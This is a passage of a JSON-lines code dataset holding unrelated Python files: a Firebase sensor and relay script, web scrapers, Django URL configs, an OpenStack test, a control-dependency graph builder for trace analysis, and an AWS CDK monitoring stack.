It's associated with your account.\r\n \"apiKey\": \"apiKey\",\r\n \"authDomain\": \"authDomain.firebaseapp.com\",\r\n \"databaseURL\": \"databaseURL.firebaseio.com/\",\r\n \"storageBucket\": \"storageBucke.appspot.com\"\r\n}\r\nuser = None\r\n\r\ndef GetAuthorized(firebase):\r\n global user\r\n auth = firebase.auth() # Get a reference to the auth service\r\n # authenticate a user\r\n try:\r\n user = auth.sign_in_with_email_and_password(\"username\",\r\n \"password\") # username and password of your account for database\r\n print(user) # display the user information, if successful\r\n except:\r\n print(\"Not authorized\")\r\n user = None\r\n\r\n# The function to initialize the database.\r\n# ====================================================================================================\r\ndef dbInitialization():\r\n firebase = pyrebase.initialize_app(config) # has to initialize the database\r\n GetAuthorized(firebase) # get authorized to operate on the database.\r\n return firebase\r\n\r\n# The function to get the data from firebase database.\r\n# ====================================================================================================\r\ndef GetDatafromFirebase(db):\r\n results = db.child(\"data\").get(user[\"idToken\"]).val(); # needs the authorization to get the data.\r\n print(\"These are the records from the Database\")\r\n print(results)\r\n return;\r\n\r\n# The function to send the data to firebase database.\r\n# ====================================================================================================\r\ndef sendtoFirebase(db, sensordata):\r\n result = db.child(\"data\").push(sensordata, user[\"idToken\"]) # needs the authorization to save the data\r\n print(result)\r\n return;\r\n\r\n\r\n# The function to send the data to firebase database's user authorized section.\r\n# Each user has a separate record tree, and it is only accessible for the authorized users.\r\n# ====================================================================================================\r\ndef sendtoUserFirebase(db, sensordata):\r\n userid = user[\"localId\"] # this will guarantee the data is stored into the user directory.\r\n result = db.child(\"userdata\").child(userid).push(sensordata, user[\"idToken\"]) # needs the authorization to save the data\r\n print(result)\r\n return;\r\n\r\n# The function to set up the record structure to be written to the database.\r\n# ====================================================================================================\r\ndef setupData(temp, humidity, timestamp, weight):\r\n sensor = {\"temperature\": temp,\r\n \"humidity\": humidity,\r\n \"weight\": weight,\r\n \"timestamp\": timestamp} # always post the timestamps in epoch with the data to track the timing.\r\n # Store the data as the dictionary format in python # refer to here:\r\n # https://www.w3schools.com/python/python_dictionaries.asp\r\n return sensor\r\n\r\n# The function to retrieve data on the relay board from the database.\r\n# ====================================================================================================\r\ndef getRelayData(db):\r\n relayResult = db.child(\"Relay\").child(\"state\").get(user[\"idToken\"]).val(); #get state of gpio pin\r\n return relayResult;\r\n \r\n# The function to set the state of the relay depending on the data from the database.\r\n# ==================================================================================================== \r\ndef relay(db):\r\n \r\n pinOut = getRelayData(db)\r\n \r\n relayS = str(board.D26)\r\n i 
= int(relayS)\r\n\r\n #set mode and state to 'low'\r\n\r\n GPIO.setup(i, GPIO.OUT)\r\n GPIO.output(i, GPIO.HIGH)\r\n\r\n # time to sleep between operations in the main loop\r\n\r\n SleepTimeL = 10\r\n\r\n # main loop\r\n\r\n if pinOut == 1: \r\n GPIO.output(26, GPIO.HIGH)\r\n print (\"Relay OFF\")\r\n if pinOut == 0: \r\n GPIO.output(26, GPIO.LOW)\r\n print (\"Relay ON\")\r\n return;\r\n \r\n \r\n# The function to initialize the load cell object.\r\n# ==================================================================================================== \r\ndef loadIt():\r\n# GPIO.setmode(GPIO.BCM) # set GPIO pin mode to BCM numbering\r\n # Create an object hx which represents your real hx711 chip\r\n # Required input parameters are only 'dout_pin' and 'pd_sck_pin'\r\n doutS = str(board.D14)\r\n pdS = str(board.D15)\r\n dout = int(doutS)\r\n pd = int(pdS)\r\n hx = HX711(dout_pin=dout, pd_sck_pin=pd)\r\n # measure tare and save the value as offset for current channel\r\n # and gain selected. That means channel A and gain 128\r\n\r\n err = hx.zero()\r\n print(err)\r\n # check if successful\r\n if err:\r\n raise ValueError('Tare is unsuccessful.')\r\n\r\n reading = hx.get_raw_data_mean()\r\n if reading: # always check if you get correct value or only False\r\n # now the value is close to 0\r\n print('Data subtracted by offset but still not converted to units:',\r\n reading)\r\n else:\r\n print('invalid data', reading)\r\n \r\n return hx\r\n\r\n# The Main control function.\r\n# ====================================================================================================\r\ndef main():\r\n try:\r\n count = 0\r\n firebase = dbInitialization()\r\n hx = loadIt()\r\n \r\n ratio = 299.939\r\n hx.set_scale_ratio(ratio) # set ratio for current channel\r\n print('Ratio is set.', ratio)\r\n while True:\r\n try:\r\n \r\n relay(firebase.database())\r\n # Print the values to the serial port\r\n temperature_c = dhtDevice.temperature\r\n temperature_f = temperature_c * (9 / 5) + 32\r\n humidity = dhtDevice.humidity\r\n \r\n \r\n print('Current weight on the scale in grams is: ')\r\n \r\n weight = hx.get_weight_mean()\r\n hx.reset()\r\n print(weight)\r\n \r\n \r\n load = weight\r\n print(\r\n \"Temp: {:.1f} F / {:.1f} C Humidity: {}% Weight: {} \".format(\r\n temperature_f, temperature_c, humidity, load\r\n )\r\n )\r\n \r\n temp = str(temperature_c) + \" C\"\r\n humid = str(humidity) + \"%\"\r\n percent = (load / 1800) * 100\r\n x = round(percent, 2) \r\n loadPercent = str(x) + \"%\"\r\n print(loadPercent)\r\n sensordata = setupData(temp,\r\n humid,\r\n int(time.time()),\r\n loadPercent)\r\n sendtoFirebase(firebase.database(), sensordata) # save to the public access data tree\r\n sendtoUserFirebase(firebase.database(), sensordata) # save to the user specific userdata tree \r\n count += 1\r\n sleep(3)\r\n print (\"Analog Signal Generated from D/A Output\")\r\n if (count == 15): # exit the program after 10 readings. 
\r\n dhtDevice.exit()\r\n break;\r\n except RuntimeError as error:\r\n # Errors happen fairly often, DHT's are hard to read, just keep going\r\n print(error.args[0])\r\n time.sleep(2.0)\r\n continue\r\n except Exception as error:\r\n dhtDevice.exit()\r\n raise error\r\n GetDatafromFirebase(firebase.database()) # this statement is outside the while loop \r\n except (KeyboardInterrupt, SystemExit):\r\n print('Bye :)')\r\n\r\n finally:\r\n GPIO.cleanup()\r\n time.sleep(2.0)\r\n \r\nif __name__==\"__main__\":\r\n main()\r\n","repo_name":"SmartAirHumidifer/SmartAirHumidifier","sub_path":"SmartAirHumidifierSourceCode/combinedSensor.py","file_name":"combinedSensor.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22960108669","text":"import requests\nimport pandas as pd\nfrom variables import Keywords\nfrom connection import SingletonMongoConnection as smc\nfrom bs4 import BeautifulSoup\n\n\ndef get_documents_without_authors(*, collection, registry) -> list[dict]:\n result = smc.get_db()[collection].find(\n {'registry': registry, 'authors': {'$exists': True}}, {'linkout': 1})\n list_cursor = list(result)\n return list_cursor\n\n\ndef find_authors_clinical_gov():\n collections = [Keywords.T_CLINICALTRIALS_OBS.value,\n Keywords.T_CLINICALTRIALS_RAND.value]\n for collection in collections:\n result = get_documents_without_authors(\n registry='ClinicalTrials.gov', collection=collection)\n for item in result:\n url = item['linkout']\n a = requests.get(url)\n soup = BeautifulSoup(a.text, 'html.parser')\n authors = []\n # je veux récupérer les auteurs de la page si le registery est clinicaltrials\n for contact in soup.find_all(attrs={\"headers\": \"contactName\"}):\n txt = contact.text.replace('Contact: ', '')\n authors.append(txt)\n for contact in soup.find_all(attrs={\"headers\": \"name\"}):\n authors.append(contact.text.replace('Contact: ', ''))\n smc.get_db()[collection].update_one(\n {'_id': item['_id']}, {'$set': {'authors': authors}})\n\n\ndef find_authors_chictr():\n collections = [Keywords.T_CLINICALTRIALS_OBS.value,\n Keywords.T_CLINICALTRIALS_RAND.value]\n for collection in collections:\n result = get_documents_without_authors(\n registry='CHICTR', collection=collection)\n for item in result:\n url = item['linkout']\n a = requests.get(url)\n soup = BeautifulSoup(a.text, 'html.parser')\n authors = []\n for contact in soup.find_all(\"p\"):\n if (contact.text == 'Study leader: '):\n txt = contact.next_sibling.next_sibling.text\n authors.append(txt)\n smc.get_db()[collection].update_one(\n {'_id': item['_id']}, {'$set': {'authors': authors}})\n\n\ndef init_scrap():\n find_authors_clinical_gov()\n find_authors_chictr()\n\n\nif __name__ == \"__main__\":\n init_scrap()\n","repo_name":"JulesLscx/covid_infograph","sub_path":"covid_infograph/files/get_authors.py","file_name":"get_authors.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"14607023739","text":"change = int(input('Change owed: '))\n\n\ndef coin_count(value):\n quarters = 0\n dimes = 0\n nickels = 0\n pennies = 0\n while value >1:\n quarters = value // 25\n value = value - (quarters*25)\n dimes = value//10\n value = value - (dimes*10)\n nickels = value//5\n value = value - (nickels*5)\n pennies = value\n value = 0\n\n total_coins = quarters+dimes+nickels+pennies\n return total_coins\n\n #print(f\"You return {total_coins} coins: 
{quarters} quarters, {dimes} dimes, {nickels} nickels, and {pennies} pennies.\")\n\nprint(f\"You give back {coin_count(change)} coins\")","repo_name":"CAW-Busteed/trials.pygame","sub_path":"PracticePython.Exercises/April2023/changecounter/change_counter.py","file_name":"change_counter.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71539579011","text":"# En el archivo urls.py de tu aplicación (miapp)\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n # Configura la URL libros/ que mapea a la vista listar_libros\n path('libros/', listar_libros, name='listar_libros'),\n path('libros/crear/', crear_libro, name='crear_libro'),\n path('libros/modificar/<int:id>/', modificar_libro, name='modificar_libro'),\n path('libros/borrar/<int:id>/', borrar_libro, name='borrar_libro'),\n path('libros/buscar/', buscar_libros, name='buscar_libros'),\n path('navbar/', navbar, name='navbar')\n]","repo_name":"gerson222/clases-de-python-para-BAM2.0","sub_path":"bam2/ejemplolibros/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40757605998","text":"from django.urls import path ,include\nfrom rest_framework.routers import DefaultRouter\nfrom api.views import UserDetailViews,UserListViews, PharmacieDetailViews,PharmacieList, HospitalListViews,HospitalDetailViews,MedicamentListviews,MedicamentDetailviews,OrdonnanceListViews,OrdonnanceDetailViews\nfrom rest_framework import renderers\n\n# User_list = UserViews.as_view({\n# 'get': 'list'\n# })\n\n# User_datail= UserViews.as_view({\n# 'get':'retrieve',\n# 'put':'update',\n# 'delete':'destroy',\n# })\n\nrouter= DefaultRouter(trailing_slash=False)\nurlpatterns = [\n \n path('phamacie/', PharmacieList.as_view(),name=\"phamacies\"),\n path(\"phamacie/<int:pk>\",PharmacieDetailViews.as_view(),name=\"phamacies-detail\"),\n path('users/', UserListViews.as_view(),name=\"users\"),\n path('users/<int:pk>', UserDetailViews.as_view(),name=\"users-dedail\"),\n path('hospitol/', HospitalListViews.as_view(),name=\"users\"),\n path('hospitol/<int:pk>', HospitalDetailViews.as_view(),name=\"users-dedail\"),\n path('medicament/', MedicamentListviews.as_view(),name=\"users\"),\n path('medicament/<int:pk>', MedicamentDetailviews.as_view(),name=\"users-dedail\"),\n path('ordonnence/', OrdonnanceListViews.as_view(),name=\"users\"),\n path('ordonnence/<int:pk>', OrdonnanceDetailViews.as_view(),name=\"users-dedail\"),\n]\n","repo_name":"kevinvoli/e-sante","sub_path":"myApi/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"22487720371","text":"#!/usr/bin/python3\nfrom add_0 import add\n\n\ndef test():\n a = 1\n b = 2\n print(\"{:d} + {:d} = {:d}\".format(a, b, add(a, b)))\n\n\n# execute only if file is not imported\nif __name__ == \"__main__\":\n test()\n","repo_name":"Arfs6/alx","sub_path":"alx-higher_level_programming/0x02-python-import_modules/0-add.py","file_name":"0-add.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"14882845701","text":"from tempest.api.compute import base\nfrom tempest import config\n\nCONF = config.CONF\n\n\nclass NetworksTest(base.BaseComputeAdminTest):\n _api_version = 
2\n\n \"\"\"\n Tests Nova Networks API that usually requires admin privileges.\n API docs:\n http://developer.openstack.org/api-ref-compute-v2-ext.html#ext-os-networks\n \"\"\"\n\n @classmethod\n def resource_setup(cls):\n super(NetworksTest, cls).resource_setup()\n cls.client = cls.os_adm.networks_client\n\n def test_get_network(self):\n resp, networks = self.client.list_networks()\n configured_network = [x for x in networks if x['label'] ==\n CONF.compute.fixed_network_name]\n self.assertEqual(1, len(configured_network),\n \"{0} networks with label {1}\".format(\n len(configured_network),\n CONF.compute.fixed_network_name))\n configured_network = configured_network[0]\n _, network = self.client.get_network(configured_network['id'])\n self.assertEqual(configured_network['label'], network['label'])\n\n def test_list_all_networks(self):\n _, networks = self.client.list_networks()\n # Check the configured network is in the list\n configured_network = CONF.compute.fixed_network_name\n self.assertIn(configured_network, [x['label'] for x in networks])\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/tempest/tempest/api/compute/admin/test_networks.py","file_name":"test_networks.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"23323269340","text":"# -*- coding: utf-8 -*-\nimport models\nimport requests\nimport multiprocessing\n\nfrom helpers import random_str\nfrom config import sqla\nfrom gevent.pool import Pool\nfrom webs.douban import parsers\n\n\ndouban_celebrity_url = 'http://movie.douban.com/celebrity/'\ncookies = {\n 'bid': ''\n}\n\n\ndef create_requests_and_save_datas(douban_id):\n session = sqla['session']\n cookies['bid'] = random_str(11)\n\n r = requests.get(\n douban_celebrity_url + str(douban_id),\n cookies=cookies,\n timeout=5\n )\n\n if r.status_code != 200:\n return\n\n data = parsers.celebrity.start_parser(r.text)\n\n celebrity = session.query(models.Celebrity).filter_by(\n douban_id=douban_id\n ).one()\n\n for key in list(data.keys()):\n if type(data[key]) == list:\n data[key] = str(data[key])\n\n for k, v in data.items():\n setattr(celebrity, k, v)\n\n celebrity.is_detail = True\n session.commit()\n print(' '.join(\n ['celebrity', douban_id, data['name']]\n ))\n\n\ndef task(douban_ids, pool_number):\n pool = Pool(pool_number)\n\n for douban_id in douban_ids:\n pool.spawn(\n create_requests_and_save_datas,\n douban_id=douban_id,\n )\n\n pool.join()\n","repo_name":"billvsme/videoSpider","sub_path":"webs/douban/tasks/get_celebrities_full_data.py","file_name":"get_celebrities_full_data.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":217,"dataset":"github-code","pt":"43"} +{"seq_id":"19113085871","text":"import random\n\n\ndef naive_mul(x, y):\n if y == 0: return 0\n r = x\n for i in range(0, y - 1):\n x += r\n return x\n\n\nfor i in range(1000):\n x = int(random.random() * 100)\n y = int(random.random() * 100)\n assert x * y == naive_mul(x, y), f\"Ошибка: x({x}) * y({y}) = {x * y}, а в функции: {naive_mul(x, y)}\"\n\n# Неправильное выделение\n# Ненужный end\n# Ненужные точки с запятыми\n# Нет возвращаемого значения в функции\n# Складывать не с 1, а с самим собой\n# Ввести условие для умножения на 
0\n","repo_name":"BigFrendyoff/VUZ","sub_path":"pr1/block3/task3_4.py","file_name":"task3_4.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37635583928","text":"import networkx as nx\n\npath = \"c_cout.dot\"\nouput_file = \"control_dep.dot\"\nmagic_exit = '0x40183d'\n#magic_exit = '0x40116e' # choose a arbitrary one,in this case it is where switch cases merge\n#'0x401fe1' works tpp\nbranch_set = set()\nins_dot_set = set()\n\ndef build_dot():\n f = open(\"c_output.txt\",'r')\n c_f= open(\"c_cout.dot\", 'w')\n c_f.write(\"digraph G {\\n\")\n\n lines = f.readlines()\n\n for i, ins in enumerate(lines[:-1]):\n if (lines[i], lines[i+1]) not in ins_dot_set:\n c_f.write(\"\\\"{0}\\\" -> \\\"{1}\\\"\\n\".format(str(lines[i][:-1]), str(lines[i+1][:-1])))\n ins_dot_set.add((lines[i], lines[i+1]))\n c_f.write(\"}\")\n\ndef get_branch_inst():\n f = open(\"branches.txt\", \"r\")\n branches = f.readlines()\n\n branches = [x[:-1] for x in branches[:-1]]\n return set(branches)\n\ndef get_ins_trace():\n f = open(\"c_output.txt\", \"r\")\n lines = f.readlines()\n lines = [x[:-1] for x in lines]\n return lines\n\ndef generate_control_dep():\n G = nx.nx_pydot.read_dot(path)\n reverse_G = G.reverse()\n\n IPD_dict = nx.immediate_dominators(reverse_G, magic_exit)\n CDS = list()\n instruction_trace = get_ins_trace()\n branch_set = get_branch_inst()\n\n o_file = open(ouput_file, 'w')\n o_file.write(\"digraph G {\\n\")\n edge_set = set()\n for i in instruction_trace:\n #i = ins[:-1]\n if len(CDS):\n if (i,CDS[-1][0]) not in edge_set:\n o_file.write(\"\\\"{0}\\\" -> \\\"{1}\\\"\\n\".format(i, CDS[-1][0]))\n edge_set.add((i,CDS[-1][0]))\n else:\n # depends on start\n if (i, \"start\") not in edge_set:\n o_file.write(\"\\\"{0}\\\" -> \\\"start\\\"\\n\".format(i))\n edge_set.add((i,\"start\"))\n\n if i in branch_set:\n CDS.append((i,IPD_dict[i]))\n\n while len(CDS) != 0 and CDS[-1][1] == i:\n del CDS[-1]\n\n o_file.write(\"}\")\n\ndef optimal_exit():\n instruction_trace = get_ins_trace()\n inst_trace = set(instruction_trace)\n num_ins = len(inst_trace)\n G = nx.nx_pydot.read_dot(path)\n reverse_G = G.reverse()\n\n ans_ins = ''\n min_diff = 100000\n for ins in inst_trace:\n IPD_dict = nx.immediate_dominators(reverse_G, ins)\n diff = num_ins - len(IPD_dict)\n\n if diff < min_diff:\n min_diff = diff\n ans_ins = ins\n\n print(f'min_diff {min_diff} ans_ins {ans_ins}')\n\ndef get_leaf_nodes():\n G = nx.nx_pydot.read_dot(path)\n\n for n in G.nodes():\n out = G.out_degree(n)\n if out == 0:\n print(n)\n#build_dot() # call once\n#optimal_exit() # call once\n# get_leaf_nodes() # no leaf nodes\ngenerate_control_dep()","repo_name":"move47/Advanced-Topics-in-Malware-Analysis","sub_path":"Lab #6/hw6.py","file_name":"hw6.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41883639882","text":"import logging\nimport sys\n\nimport pandas as pd\nimport requests\n\n\ndef init_logger() -> logging.Logger:\n logger = logging.getLogger(\"free-proxy\")\n logger.setLevel(logging.DEBUG)\n\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - [%(levelname)s] - %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n stdout_handler.setFormatter(formatter)\n\n logger.addHandler(stdout_handler)\n return logger\n\n\nclass BaseProxiesCrawler(object):\n logger 
= init_logger()\n\n def __init__(self) -> None:\n super().__init__()\n\n @staticmethod\n def empty_proxies(self) -> pd.DataFrame:\n return pd.DataFrame(columns=[\"ip address\", \"port\"])\n","repo_name":"Phimos/Comments-Mining-System-for-Scholar-Citations","sub_path":"citeminer/crawlers/freeproxy/base_proxy_crawler.py","file_name":"base_proxy_crawler.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"7149012196","text":"from aws_cdk import (\n core as cdk,\n aws_lambda as lambda_,\n aws_events as events_,\n aws_events_targets as targets_,\n aws_iam,\n aws_cloudwatch as cloudwatch_,\n aws_lambda_event_sources as sources_,\n aws_cloudwatch_actions as actions_,\n aws_sns as sns,\n aws_sns_subscriptions as subscriptions_,\n aws_codedeploy as codedeploy,\n aws_dynamodb as db,\n aws_apigateway as apigateway,\n aws_s3 as s3,\n aws_sqs as sqs,\n aws_s3_notifications as s3n\n)\n#import Construct as Construct\nfrom resources import constants as constants\nimport resources as resources\nfrom resources import s3b\nfrom resources import dyTabS3\nimport logging\n# from resources.controller import Controller\n# from resources.handler import Handler\n# from resources.repository import DynamoDBTaskRepository\nfrom resources.s3b import s3bukclass as buk\nfrom resources import constants as constants\nTable_NAME= \"waheeds3table\"\nfrom resources import tablelambda as read\n\nclass waheedsprint2(cdk.Stack):\n\n \n \n def __init__(self, scope: cdk.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n\n\n# ---------------------------------------------- defining roles for web health------------------------#\n lambda_role= self.create_lambda_role()\n hw_lambda = self.create_lambda('lambda', './resources', 'webhealthmonitor.lambda_handler', lambda_role)\n lambda_schedule= events_.Schedule.rate(cdk.Duration.minutes(1))\n lambda_target=targets_.LambdaFunction(handler=hw_lambda)\n rule= events_.Rule(self, \"webHealth_invoke\", \n description= \"call lambda periodic\", \n enabled= True ,\n schedule= lambda_schedule,\n targets= [lambda_target]) #remember the braces, i spent so much time to figure out this error, cz this is treateda as array\n \n ## ------------------- create a table in dynamoDB to use and dblambda------------------- ##\n \n \n \n urltable=self.create_table(id='waheedurltable',\n key=db.Attribute(name=\"Links\",\n type=db.AttributeType.STRING))\n db_lambda_role = self.create_dbtable_lambda_role()\n s3_lambda = self.create_lambda(\"sprint3Lambda\", \"./resources\", \"s3lambda.lambda_handler\", db_lambda_role)\n \n db_lambda = self.create_lambda(\"DynamoDBLambda\", \"./resources\", 'dynamodb_lambda.lambda_handler', lambda_role)\n # s3_lambda = self.create_lambda('s3lambda',\"./resources/\",'dynamoSp3.lambda_handler',db_lambda_role)\n # s3_lambda.add_environment('table_name', urltable.table_name)\n \n #dynamo_table.grant_full_access(db_lambda)\n buckkk = s3b.s3bukclass(self, \"waheedbuc\")\n s3_lambda.add_event_source(sources_.S3EventSource(buckkk,\n events=[s3.EventType.OBJECT_CREATED],\n filters=[s3.NotificationKeyFilter(suffix=\".json\")]\n ))\n # urltable.grant_full_access(s3_lambda)\n # hw_lambda.add_environment('table_name', urltable.table_name)\n # s3_lambda.add_environment('table_name', urltable.table_name)\n \n # api_definition_s3_location = apigateway.ApiDefinitionS3Location(\n # bucket=\"waheedbuc\",\n # key=\"key\")\n # crud_lambda = 
self.create_lambda('crudlambda',\n # \"./resources1/\",\n # 'CRUD_api_lambda.lambda_handler',\n # db_lambda_role)\n # crud_lambda.add_environment(key = 'table_name', \n # value = constants.TABLENAME)\n # crud_lambda.grant_invoke( aws_iam.ServicePrincipal(\"apigateway.amazonaws.com\"))\n # urltable.grant_read_write_data(crud_lambda) \n \n # api = apigateway.LambdaRestApi(self, \"waheedapiiiigatewayy\",handler= crud_lambda)\n # items = api.root.add_resource(\"items\")\n # items.add_method(\"GET\") \n # items.add_method(\"PUT\") \n # items.add_method(\"DELETE\")\n \n \n # s3_lambda.add_environment(key = 'table_name', \n # value = )\n \n \n \n # hw_lambda.add_environment(key = 'table_name', \n # value = )\n \n \n #-----------------------------notifications subscriptions------------------------------------ #\n topic =sns.Topic(self, \"webhealthmonitortopic\")\n topic.add_subscription(subscriptions_.EmailSubscription('waheed.ahmad.s@skipq.org'))\n topic.add_subscription(subscriptions_.LambdaSubscription(fn=db_lambda))\n \n \n \n \n \n #------------------------alarms and matrices-----------------------------------------------#\n URlstomonitor = buk('waheeds3buk','urls.json').read_buk()\n linkx = read.gettable(Table_NAME)\n conss= 1\n for url in linkx:\n dimension={'URL' : url}\n \n availability_metric=cloudwatch_.Metric(namespace=constants.URL_MONITOR_NAMESPACE, \n metric_name= constants.URL_MONITOR_NAME_AVAILABILITY,\n dimensions_map=dimension,\n period=cdk.Duration.minutes(1),\n label= 'Availability Metric')\n availability_alarm= cloudwatch_.Alarm(self, \n \t\t\tid='AvailabilityAlarm'+'_'+constants.URL_TO_MONITOR,\n \t\t\tmetric= availability_metric , \n \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.LESS_THAN_THRESHOLD , \n \t\t\tdatapoints_to_alarm=1, \n \t\t\tevaluation_periods=1,\n \t\t \tthreshold=1) \n \n dimension={'URL':url}\n latency_metric=cloudwatch_.Metric(namespace=constants.URL_MONITOR_NAMESPACE, \n metric_name=constants.URL_MONITOR_NAME_LATENCY,\n dimensions_map=dimension,\n period=cdk.Duration.minutes(1),\n label= 'latency Metric' )\n latency_alarm= cloudwatch_.Alarm(self, \n \t\t\tid='LatencyAlarm'+'_'+constants.URL_TO_MONITOR,\n \t\t\tmetric= latency_metric , \n \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.GREATER_THAN_THRESHOLD , \n \t\t\tdatapoints_to_alarm=1, \n \t\t\tevaluation_periods=1,\n \t\t \tthreshold=0.25 )\n availability_alarm.add_alarm_action(actions_.SnsAction(topic))\n latency_alarm.add_alarm_action(actions_.SnsAction(topic))\n conss+=1\n \n ##########link the alarm to subscription\n \n# duration_metric=cloudwatch_.Metric(namespace = 'AWS/Lambda', \n# metric_name = 'Duration',\n# dimensions_map = {'FunctionName' :hw_lambda.function_name})\n# failure_alarm= cloudwatch_.Alarm(self, \n# \t\t\tid='pipelinealarm',\n# \t\t\tmetric= duration_metric , \n# \t\t\tcomparison_operator= cloudwatch_.ComparisonOperator.GREATER_THAN_THRESHOLD, \n# \t\t\tevaluation_periods=1,\n# \t\t \tthreshold=350) \n# versions = hw_lambda.add_version(\"nnversion\")\n# myalias = lambda_.Alias(self, \"LambdaAlias\",\n# alias_name=\"waheedpipelinealias\",\n# version= hw_lambda.current_version)\n\n# codedeploy.LambdaDeploymentGroup(self, \"webhealthmonitor\",\n# alias= myalias,\n# alarms = [failure_alarm])\n \n \n# # codedeploy.LambdaDeploymentConfig(self, \n# # \"code\" ,\n# # alias,\n# # LINEAR_10_PERCENT_EVERY_5_MINUTE,\n# # alarms=[failure_alarm])\n# failure_alarm.add_alarm_action(actions_.SnsAction(topic))\n \n def create_lambda_role(self):\n lambdaRole = 
aws_iam.Role(self, \"lambda-role-db\",\n assumed_by = aws_iam.ServicePrincipal('lambda.amazonaws.com'),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonSNSFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonS3FullAccess')\n ])\n return lambdaRole\n def create_dbtable_lambda_role(self):\n lambdaRole = aws_iam.Role(self, \"lambda-role-db2\",\n assumed_by = aws_iam.ServicePrincipal('lambda.amazonaws.com'),\n managed_policies=[\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('service-role/AWSLambdaBasicExecutionRole'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonDynamoDBFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonSNSFullAccess'),\n aws_iam.ManagedPolicy.from_aws_managed_policy_name('AmazonS3FullAccess')\n ])\n return lambdaRole\n \n # def create_alais(self,id,name,version):\n # return lambda_.Alias(self , id , alias_name = name,\n # version = version)\n \n def create_lambda(self, id, asset,handler, role):\n return lambda_.Function(self, id,\n runtime=lambda_.Runtime.PYTHON_3_6 ,\n handler=handler,\n code=lambda_.Code.from_asset(asset),\n role=role\n)\n ### create table ###\n \n def create_table(self,id,key):\n return db.Table(self,id,\n partition_key=key)\n \n \n \n","repo_name":"waheed2021skipq/ProximaCentauri","sub_path":"waheed_ahmad/sprint3/sprint3/sprint3_stack.py","file_name":"sprint3_stack.py","file_ext":"py","file_size_in_byte":10273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8077581447","text":"import cv2\nimport numpy as np\nimport glob as gb\nimport copy as cp\nimport book_parms as bpar\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom time import sleep\n#\n# Useful classes \n#\nimport newfcns as nf\n\n \ndef RC2PXY(rcTuple): ## OpenCV's confusing Point coords.\n return (rcTuple[1],rcTuple[0])\n\nclass bookImage():\n def __init__(self,img, mmPpx):\n self.scale = mmPpx # mm per pixel (or 1 pixel in mm)\n self.image = img\n \n # set up the size/shape parameters\n sh = self.image.shape\n self.rows = sh[0]\n self.cols = sh[1]\n if len(sh) > 2:\n self.type = 'color'\n else:\n self.type = 'mono'\n self.width_mm = self.cols*self.scale\n self.height_mm = self.rows*self.scale\n self.ctXmm = self.width_mm/2.0 # mm offset to center of image H\n self.ctYmm = self.height_mm/2.0 # mm offset to center of image V\n \n # validate image type here\n \n def isequal(self,x):\n if self.type != 'mono':\n print('illegal image type for isequal()')\n quit()\n mask = int(np.zeros((self.rows,self.cols)))\n for r in range(self.rows):\n for c in range(self.cols):\n if self.image[r,c] == x:\n mask[r,c] = 1\n return mask\n \n def icopy(self):\n return cp.deepcopy(self,{})\n \n def blank(self):\n x = np.ndarray([self.rows, self.cols,3])\n return x\n \n def write(self):\n name = input('Enter an image file name: (w/o .png)')\n name += '.png'\n cv2.imwrite(name, self.image)\n \n def ishape(self): \n sh = self.image.shape\n \n #print(' Image scale info:')\n #print(' Scale Factor: ', self.scale, ' mm/pixel')\n #print(' rows/cols: ', sh)\n #print(' height/width(mm)', self.height_mm, self.width_mm )\n \n return sh\n \n def get_px_RC(self,row,col):\n return(self.image[row][col])\n \n def set_px_RC(self, row,col,value):\n if self.type == 'mono':\n l1 =1\n elif 
